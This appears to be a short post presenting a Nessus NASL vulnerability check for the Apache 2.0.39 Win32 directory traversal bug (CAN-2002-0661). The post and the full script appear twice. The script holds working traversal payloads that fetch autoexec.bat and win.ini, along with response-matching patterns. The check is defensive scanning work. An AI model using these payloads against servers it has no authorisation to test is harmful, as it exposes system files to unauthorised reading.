Quick & dirty test for a nasty bug...
I was lucky to find a mirror that was not up to date, so I could
download Apache 2.0.39 and test this.
# This script was quicky written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecuriTeam.
#
# GPL
if(description)
{
  # Plugin registration: identifiers, user-visible texts and scheduling hints
  # for the scanner. The strings are gathered first, then handed to the
  # script_* registration calls.
  name["english"]    = "Apache 2.0.39 Win32 directory traversal";
  summary["english"] = "Apache 2.0.39 Win32 directory traversal";
  family["english"]  = "CGI abuses";
  desc["english"]    = "
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High";

  script_id(11092);
  script_version("$Revision$");
  script_cve_id("CAN-2002-0661");
  script_name(english:name["english"]);
  script_description(english:desc["english"]);
  script_summary(english:summary["english"]);
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
  script_family(english:family["english"]);
  # Run after the service finder and the no404 probe. NOTE(review): the result
  # of no404.nasl is presumably meant to filter servers that answer 200 for any
  # path, but nothing below reads it — confirm whether the check should.
  script_dependencie("find_service.nes", "no404.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}
# Check starts here
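# check(req): fetch the traversal path `req` from the web server on the
# global `port` and decide from the response whether a Windows system file
# came back instead of an error page.
#
# Returns 1 (after reporting the hole on `port`) when a marker is found,
# 0 otherwise: connection failure, empty answer or no marker.
#
# Markers are anchored at the start of a response line. The previous
# substring tests ("mode" >< buf, "export" >< buf, ...) fired on ordinary
# HTML/JavaScript bodies, which contain those words routinely, and so
# produced false positives against unaffected servers.
function check(req)
{
  soc = open_sock_tcp(port);
  if(!soc) return(0);

  req = http_get(item:req, port:port);
  send(socket:soc, data:req);
  # One read of at most 4096 bytes: enough for the status line, headers and
  # the first lines of a small text file such as win.ini or autoexec.bat.
  buf = recv(socket:soc, length:4096);
  close(soc);

  # autoexec.bat style lines: optional leading blanks / "@" (as in "@ECHO OFF"),
  # then a DOS command. Line-anchored so the words must start a line.
  if (egrep(pattern:"^[ @]*(ECHO|SET |export|EXPORT|mode|MODE|doskey|DOSKEY)", string:buf) ||
      # INI section headers: [fonts]/[extensions] are standard win.ini sections;
      # [boot loader] is kept from the original list even though boot.ini is
      # not among the paths this script requests.
      egrep(pattern:"^[[](boot loader|fonts|extensions)[]]", string:buf))
  {
    security_hole(port:port);
    return(1);
  }
  return(0);
}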
# Target port: the HTTP service recorded by find_service, else 80.
port = get_kb_item("Services/www");
if(!port) port = 80;

# Traversal probes: URL-encoded "\..\..\..\..\" (%5c = backslash, %2e = dot)
# under /error/, followed by an empty sentinel that ends the loop below.
cginameandpath[0] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] = "";

# Nothing to do when the port is closed or filtered.
if(!get_port_state(port)) exit(0);

# Try each probe in turn; the first positive result reports and ends the script.
i = 0;
while (cginameandpath[i])
{
  if (check(req:cginameandpath[i])) exit(0);
  i = i + 1;
}
I was lucky to find a mirror that was not up to date, so I could
download Apache 2.0.39 and test this.
# This script was quicky written by Michel Arboi <arboi@bigfoot.com>
# starting from badblue_directory_traversal.nasl by SecuriTeam.
#
# GPL
if(description)
{
  # Plugin registration: identifiers, user-visible texts and scheduling hints
  # for the scanner. The strings are gathered first, then handed to the
  # script_* registration calls.
  name["english"]    = "Apache 2.0.39 Win32 directory traversal";
  summary["english"] = "Apache 2.0.39 Win32 directory traversal";
  family["english"]  = "CGI abuses";
  desc["english"]    = "
A security vulnerability in Apache 2.0.39 allows attackers to access
files that would otherwise be inaccessible using a directory
traversal attack.
Solution: Upgrade to Apache 2.0.40 or install it on a Unix machine
Risk factor : High";

  script_id(11092);
  script_version("$Revision$");
  script_cve_id("CAN-2002-0661");
  script_name(english:name["english"]);
  script_description(english:desc["english"]);
  script_summary(english:summary["english"]);
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
  script_family(english:family["english"]);
  # Run after the service finder and the no404 probe. NOTE(review): the result
  # of no404.nasl is presumably meant to filter servers that answer 200 for any
  # path, but nothing below reads it — confirm whether the check should.
  script_dependencie("find_service.nes", "no404.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}
# Check starts here
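# check(req): fetch the traversal path `req` from the web server on the
# global `port` and decide from the response whether a Windows system file
# came back instead of an error page.
#
# Returns 1 (after reporting the hole on `port`) when a marker is found,
# 0 otherwise: connection failure, empty answer or no marker.
#
# Markers are anchored at the start of a response line. The previous
# substring tests ("mode" >< buf, "export" >< buf, ...) fired on ordinary
# HTML/JavaScript bodies, which contain those words routinely, and so
# produced false positives against unaffected servers.
function check(req)
{
  soc = open_sock_tcp(port);
  if(!soc) return(0);

  req = http_get(item:req, port:port);
  send(socket:soc, data:req);
  # One read of at most 4096 bytes: enough for the status line, headers and
  # the first lines of a small text file such as win.ini or autoexec.bat.
  buf = recv(socket:soc, length:4096);
  close(soc);

  # autoexec.bat style lines: optional leading blanks / "@" (as in "@ECHO OFF"),
  # then a DOS command. Line-anchored so the words must start a line.
  if (egrep(pattern:"^[ @]*(ECHO|SET |export|EXPORT|mode|MODE|doskey|DOSKEY)", string:buf) ||
      # INI section headers: [fonts]/[extensions] are standard win.ini sections;
      # [boot loader] is kept from the original list even though boot.ini is
      # not among the paths this script requests.
      egrep(pattern:"^[[](boot loader|fonts|extensions)[]]", string:buf))
  {
    security_hole(port:port);
    return(1);
  }
  return(0);
}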
# Target port: the HTTP service recorded by find_service, else 80.
port = get_kb_item("Services/www");
if(!port) port = 80;

# Traversal probes: URL-encoded "\..\..\..\..\" (%5c = backslash, %2e = dot)
# under /error/, followed by an empty sentinel that ends the loop below.
cginameandpath[0] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat";
cginameandpath[1] = "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini";
cginameandpath[2] = "";

# Nothing to do when the port is closed or filtered.
if(!get_port_state(port)) exit(0);

# Try each probe in turn; the first positive result reports and ends the script.
i = 0;
while (cginameandpath[i])
{
  if (check(req:cginameandpath[i])) exit(0);
  i = i + 1;
}